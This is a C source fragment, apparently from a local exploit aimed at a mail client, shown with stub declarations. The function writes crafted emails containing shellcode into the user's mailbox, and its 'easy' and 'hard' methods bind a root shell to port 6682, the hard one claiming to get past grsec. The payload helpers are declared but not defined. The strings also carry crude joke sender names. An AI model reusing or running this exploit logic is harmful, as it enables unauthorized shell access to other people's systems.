
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct target_info {scalar_t__ dist; scalar_t__ buff; int sys; scalar_t__ method; } ;
typedef int FILE ;


 scalar_t__ PLIST ;
 int die (int,char*) ;
 int exit (int ) ;
 int * fopen (char*,char*) ;
 int fprintf (int *,char*,char*) ;
 struct target_info getTarget () ;
 scalar_t__ getenv (char*) ;
 int lame_cmd ;
 char* mail ;
 int own_easy (scalar_t__,int ) ;
 int own_hard (int ,scalar_t__,scalar_t__,scalar_t__,int ) ;
 int prepare_mail (char*,char*,char*) ;
 int printf (char*,...) ;
 int shellcode ;

void skriptkiddie_s0lar() {
 char *mbox;
 FILE *f;
 struct target_info target;


 printf("O shit... is it s0lar running this exp again?\n"
"not even a -h? ok lets make her happy and make everyhing magically work\n"
  "WARNING: need write axx on /tmp and use of gdb (no grsec high)\n\n");

 target = getTarget();



 mbox = (char*)getenv("MAIL");
 if(!mbox)
  die(0,"getenv()");

 printf("Attempting to write mails to %s\n",mbox);
 f = fopen(mbox,"a");
 if(!f)
  die(1,"fopen()");


 prepare_mail("Andrei Koymaski <andrei gay ru>",
 "Easy method portbind 6682","Gustavo Lamazza <gustavo gay it>");
 own_easy(target.dist,shellcode);
 if(fprintf(f,"From sorbo Tue Nov 29 00:00:00 1983\n%s\n",mail)<1)
  die(1,"fprintf()");







 if(target.method) {
  prepare_mail("Osama Bin Laden <osama al-quaeda ar>",
"Hard method (owns grsec) portbind 6682 with vi... spawn shell from vi",
   "George Bush <george whitehouse gov>");
  own_hard(target.sys,target.buff-PLIST,target.buff,
   target.dist-4,
  lame_cmd);

 if(fprintf(f,"From sorbo Tue Nov 29 00:00:00 1983\n%s\n",mail)<1)
  die(1,"fprintf()");
 }

 printf("You should have mail... read with pine and see if this"
  " crap worx\n");
 printf("Enjoy.... s0lar ti amo\n");
 exit(0);

}
